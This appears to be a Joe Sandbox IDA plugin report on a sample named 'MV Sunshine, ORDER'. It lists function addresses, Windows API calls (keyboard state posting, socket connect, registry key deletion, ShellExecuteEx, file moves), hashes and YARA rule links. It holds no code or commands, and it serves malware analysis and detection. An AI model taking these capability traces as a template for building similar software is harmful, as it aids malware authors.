Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 45f32db09a1fdeab47e1fa868ceac06c0b3ea6da52260a64e04f18bebdd92822
Instruction ID: 2777e46ab833d45e9e40bce6f1db6bf98334a4ca4f7e11f5d1f1a79c71f2bf62
Opcode Fuzzy Hash: 45f32db09a1fdeab47e1fa868ceac06c0b3ea6da52260a64e04f18bebdd92822
Instruction Fuzzy Hash: FA31AF31904209EFCF10EFA5DC85AAEBB78EF85710F1441A5F904AB256DB709E11CBA1

Function 00A06442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A0645A
GetDC.USER32(00000000), ref: 00A06462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A0646D
ReleaseDC.USER32(00000000,00000000), ref: 00A06479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A064B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A064C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A09299,?,?,000000FF,00000000,?,000000FF,?), ref: 00A06500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A06520

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 17a1578fa5843aeb8fe6dd7916b778333c790cff511dd2feb930fcc95c0445be
Instruction ID: 4857d78f957011823e3ed98ed0f097cd3f5833b70aa2ce998888adf172390c4c
Opcode Fuzzy Hash: 17a1578fa5843aeb8fe6dd7916b778333c790cff511dd2feb930fcc95c0445be
Instruction Fuzzy Hash: 01317F72201218BFEB218F50DC8AFEA3FA9EF09765F044065FE08AA191D7759C52CB74

Function 009DC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 009DC087
_memcmp.LIBCMT ref: 009DC0A9
_memcmp.LIBCMT ref: 009DC0C1
_memcmp.LIBCMT ref: 009DC0D4
_memcmp.LIBCMT ref: 009DC0EE
_memcmp.LIBCMT ref: 009DC101
_memcmp.LIBCMT ref: 009DC119
_memcmp.LIBCMT ref: 009DC134

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 3d65cd5f20f20fab22928f28cb2ae09673e1b272382ec48f2f26fe1dd357d7a5
Instruction ID: 7d367f6b4463b67e50915452e863c17c1338b8450ce8731299c5ecaee242386d
Opcode Fuzzy Hash: 3d65cd5f20f20fab22928f28cb2ae09673e1b272382ec48f2f26fe1dd357d7a5
Instruction Fuzzy Hash: F421A7F1685217B7DA14A921DD42FFB235CAF61394F088422FE05D6382EB56DD21C3E5

Function 009EED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

Part of subcall function 0099FEC6: _wcscpy.LIBCMT ref: 0099FEE9

_wcstok.LIBCMT ref: 009EEEFF
_wcscpy.LIBCMT ref: 009EEF8E
_memset.LIBCMT ref: 009EEFC1

Strings

X, xrefs: 009EEFFE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: c8baf9d6e32f9894d1c96561e9cf2221f50ef27044028a253589067fd12f2753
Instruction ID: 53756164ec7839e9867cd9bb57c1c55f55731e9bb5bc4b257565b76b33dcc3ce
Opcode Fuzzy Hash: c8baf9d6e32f9894d1c96561e9cf2221f50ef27044028a253589067fd12f2753
Instruction Fuzzy Hash: 37C157316083409FC725EF68C891B6AB7E4BF85310F14492DF8999B3A2DB70ED45CB82

Function 00981424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aea4cd3cf2c6f22bbbf816218d351f8dc20f753c7024ffb1b2e4c75f78bd104
Instruction ID: aed96deb0be66bc6989cfc95e1a44aa5c76a18e31bcde43c13a0c2bcb9166a4e
Opcode Fuzzy Hash: 2aea4cd3cf2c6f22bbbf816218d351f8dc20f753c7024ffb1b2e4c75f78bd104
Instruction Fuzzy Hash: 30716E31900109EFDB14DFA8CC89EBEBB79FF85324F148159F915AA351C774AA52CBA0

Function 009F6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8be82bde4f36c67ebca50c72adcb1833369f18f7540e88b709c6ef4d42ce09c
Instruction ID: f0f7fa738e547483ee7f8773c4076a8e28f3d868e8df03cdc867105f069e52ee
Opcode Fuzzy Hash: a8be82bde4f36c67ebca50c72adcb1833369f18f7540e88b709c6ef4d42ce09c
Instruction Fuzzy Hash: C261BB32108304ABC710EB64CC82F6BB7E9AFC4714F184A19F646972A2DB70AD05C7A2

Function 00A0B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(015B92B0), ref: 00A0B6A5
IsWindowEnabled.USER32(015B92B0), ref: 00A0B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A0B795
SendMessageW.USER32(015B92B0,000000B0,?,?), ref: 00A0B7CC
IsDlgButtonChecked.USER32(?,?), ref: 00A0B809
GetWindowLongW.USER32(015B92B0,000000EC), ref: 00A0B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A0B843

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 9cc399d6c56a7eb6510e45f7efd74b67d418297e53f641890d1047d278659e3a
Instruction ID: 80b0eb1d9a31074478452e046c651570f800412e7653ba1e028a6fe3fd477997
Opcode Fuzzy Hash: 9cc399d6c56a7eb6510e45f7efd74b67d418297e53f641890d1047d278659e3a
Instruction Fuzzy Hash: 61719338611208AFDB20DF64DAE4FAA7BB9FF89300F144069F955973E1C732A941DB61

Function 009FF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009FF75C
_memset.LIBCMT ref: 009FF825
ShellExecuteExW.SHELL32(?), ref: 009FF86A

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

Part of subcall function 0099FEC6: _wcscpy.LIBCMT ref: 0099FEE9

GetProcessId.KERNEL32(00000000), ref: 009FF8E1
CloseHandle.KERNEL32(00000000), ref: 009FF910

Strings

@, xrefs: 009FF839

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: efdec1f3fbd1f53714c50798003ef2c07afdeddc3ddd90c250370975c83ff79b
Instruction ID: 83764d71a92d7890c5d7fb65bd678752ed6861623010524945c1650d638011bb
Opcode Fuzzy Hash: efdec1f3fbd1f53714c50798003ef2c07afdeddc3ddd90c250370975c83ff79b
Instruction Fuzzy Hash: 0C619D75A00619DFCF14EF94C590AAEBBF5FF88310F148469E95AAB351CB31AD41CB90

Function 009E145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 009E149C
GetKeyboardState.USER32(?), ref: 009E14B1
SetKeyboardState.USER32(?), ref: 009E1512
PostMessageW.USER32(?,00000101,00000010,?), ref: 009E1540
PostMessageW.USER32(?,00000101,00000011,?), ref: 009E155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 009E15A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 009E15C8

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
Instruction ID: c8423ade9ae25bd5375f5f6bd68b10819324f8ab828269ca1de4afe63ffae3e2
Opcode Fuzzy Hash: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
Instruction Fuzzy Hash: F051F0B0A046D53EFB3782268C05BBABEAD6B46704F088489F1D6568D2D6A9AC84D750

Function 009E1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 009E12B5
GetKeyboardState.USER32(?), ref: 009E12CA
SetKeyboardState.USER32(?), ref: 009E132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009E1357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009E1374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009E13B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009E13D9

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
Instruction ID: 5f18f0300d5eb951ee43e1647a3dac2b690248978a69bc22582bef1a1e96c7b5
Opcode Fuzzy Hash: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
Instruction Fuzzy Hash: F551E2B05046D57DFB3383268C45BBABFAD6B06300F088589E1D45ADD2E3A5EC98D760

Function 009E589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 009E58AC
_wcsncpy.LIBCMT ref: 009E58E1
_wcsncpy.LIBCMT ref: 009E5913
_wcsncpy.LIBCMT ref: 009E5946
_wcsncpy.LIBCMT ref: 009E5988
_wcsncpy.LIBCMT ref: 009E59C2
_wcsncpy.LIBCMT ref: 009E59F1

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 3b027db495cf325d4b53e47505d3cb20b1ad6202f82298728807acfce4b197bc
Instruction ID: 182a0beeca613a2b6a70cb70be85b0a37eda02b06edfbc7a91c38eb339bdc3a0
Opcode Fuzzy Hash: 3b027db495cf325d4b53e47505d3cb20b1ad6202f82298728807acfce4b197bc
Instruction Fuzzy Hash: 8141C2A5C2021876CB11EBB58C86ACFB7AC9F46310F618462F918E3122E734E755C7E9

Function 009E38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E38D3,?), ref: 009E48C7

Part of subcall function 009E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E38D3,?), ref: 009E48E0

lstrcmpiW.KERNEL32(?,?), ref: 009E38F3
_wcscmp.LIBCMT ref: 009E390F
MoveFileW.KERNEL32(?,?), ref: 009E3927
_wcscat.LIBCMT ref: 009E396F
SHFileOperationW.SHELL32(?), ref: 009E39DB

Strings

\*.*, xrefs: 009E3969

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: d17139a83f7dcd19b3ab745cfbbf59b931491b3772b8b859ec32dc14d3ea2560
Instruction ID: 0e827d4a3ff9a6b3ab070ad1b8425d3230a827b3eb330953fe050153ee1f4dfc
Opcode Fuzzy Hash: d17139a83f7dcd19b3ab745cfbbf59b931491b3772b8b859ec32dc14d3ea2560
Instruction Fuzzy Hash: 294193714083849EC752EF65C485ADFB7ECAF89340F10492EF489C3152EB74DA89C752

Function 00A07500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A07519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A075C0
IsMenu.USER32(?), ref: 00A075D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A07620
DrawMenuBar.USER32 ref: 00A07633

Strings

0, xrefs: 00A0750D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: e18da4368d2348a42df929a40d1c86925978d7a735a3466f52bd993f1503f0f9
Instruction ID: 37711ffc4d028e35229aac257afd422fd4a671e3aa41ae907fc0061d77669b58
Opcode Fuzzy Hash: e18da4368d2348a42df929a40d1c86925978d7a735a3466f52bd993f1503f0f9
Instruction Fuzzy Hash: 61412A75A04649EFDB20DF94E884E9EBBF8FB05314F048129E956A7290DB31BD51CF90

Function 00A0122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A0125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A01286
FreeLibrary.KERNEL32(00000000), ref: 00A0133D

Part of subcall function 00A0122D: RegCloseKey.ADVAPI32(?), ref: 00A012A3
Part of subcall function 00A0122D: FreeLibrary.KERNEL32(?), ref: 00A012F5
Part of subcall function 00A0122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A01318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A012E0

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: d981c594b1f6abc152a7a866e0a20c28d100e2e37433ec216a402cfdca78ed4f
Instruction ID: 8302b42f851141e55cb4449ce897a7e38320369b214de7dc1fe33de4bb2d35cf
Opcode Fuzzy Hash: d981c594b1f6abc152a7a866e0a20c28d100e2e37433ec216a402cfdca78ed4f
Instruction Fuzzy Hash: FC310AB190111DBFEB15DFD0EC89AFEB7BCEF08300F000179E511E6591EA749E869AA1

Function 00A0653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A0655B
GetWindowLongW.USER32(015B92B0,000000F0), ref: 00A0658E
GetWindowLongW.USER32(015B92B0,000000F0), ref: 00A065C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A065F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A0661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00A06630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A0664A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 0a212c5cf005e91f826c94429d70acef2525fd9e0a87b3f53eb3d024aaa82e4b
Instruction ID: a37c6c3932d940cb75334749b9bf948c3619ddf7bc4ad74d2d65f329b3b8984c
Opcode Fuzzy Hash: 0a212c5cf005e91f826c94429d70acef2525fd9e0a87b3f53eb3d024aaa82e4b
Instruction Fuzzy Hash: 10310238604258AFDB20CF98EC85F553BE1FB4A718F1801A8F5019B2F5CB62B862DB41

Function 009F6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F80CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009F64D9
WSAGetLastError.WSOCK32(00000000), ref: 009F64E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F6521
connect.WSOCK32(00000000,?,00000010), ref: 009F652A
WSAGetLastError.WSOCK32 ref: 009F6534
closesocket.WSOCK32(00000000), ref: 009F655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009F6576

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 501cfc8e5bab0e2a831b441e67913c226fd5ad70cd83039767abc8c7561bb1b5
Instruction ID: 42a9b4a00ee12df6a6f1c13adcc98704a75e5eb55e555a12b7ad3fd622a218a6
Opcode Fuzzy Hash: 501cfc8e5bab0e2a831b441e67913c226fd5ad70cd83039767abc8c7561bb1b5
Instruction Fuzzy Hash: C431937160021CAFDB10EF64CC85BBE7BBDEB44714F048069FA49A7291DB74AD05CBA1

Function 009DE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DE0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009DE120
SysAllocString.OLEAUT32(00000000), ref: 009DE123
SysAllocString.OLEAUT32 ref: 009DE144
SysFreeString.OLEAUT32 ref: 009DE14D
StringFromGUID2.OLE32(?,?,00000028), ref: 009DE167
SysAllocString.OLEAUT32(?), ref: 009DE175

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
